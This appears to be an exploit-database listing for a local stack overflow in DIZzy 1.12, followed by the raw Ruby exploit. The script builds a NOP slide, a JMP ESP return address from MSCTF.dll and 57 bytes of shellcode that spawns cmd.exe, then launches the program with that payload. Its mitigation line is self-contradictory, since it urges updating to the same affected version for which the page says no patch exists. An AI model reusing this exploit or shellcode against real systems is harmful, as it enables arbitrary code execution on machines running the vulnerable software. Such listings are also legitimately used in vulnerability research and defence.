header-logo
Suggest Exploit
vendor:
DIZzy
by:
g30rg3_x
7,8
CVSS
HIGH
Stack Overflow
119
CWE
Product Name: DIZzy
Affected Version From: 1.12
Affected Version To: 1.12
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 Eng/Spa
2010

DIZzy 1.12 Local Stack Overflow

DIZzy 1.12 is vulnerable to a local stack overflow vulnerability. The bug was originally found on 22/02/2010 but since there is no response from developers it goes public. An attacker can exploit this vulnerability by executing a specially crafted payload with a length of 284 NOPs followed by a JMP ESP address from MSCTF.dll and 17 NOPs followed by a 57-byte shellcode.

Mitigation:

Update to the latest version of DIZzy 1.12
Source

Exploit-DB raw data:

#!/usr/bin/ruby
# Exploit Title: DIZzy 1.12 Local Stack Overflow
# Google Dork: n/a
# Date: 17/11/2010
# Author: g30rg3_x
# Version: 1.12
# Tested on: Windows XP SP3 Eng/Spa
# CVE: n/a
# Notes: Bug was originally found on 22/02/2010 but since there is no response from
#        developers it goes public.

# win32/xp sp2 cmd.exe 57 bytes - Mountassif Moad aka Stack
# http://www.exploit-db.com/exploits/13511/
shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" +
             "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" +
             "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" +
             "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" +
             "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"

# Preparing the exploit...
nop_slide  = "\x90" * 284
nop_slide2 = "\x90" * 17
jmp_esp    = "\x73\x18\x6E\x74" # win32/xp sp3 MSCTF.dll: JMP ESP
exploit    = nop_slide + jmp_esp + nop_slide2 + shellcode
executable = 'dizzy.exe'

# Boom!
exec(executable, exploit)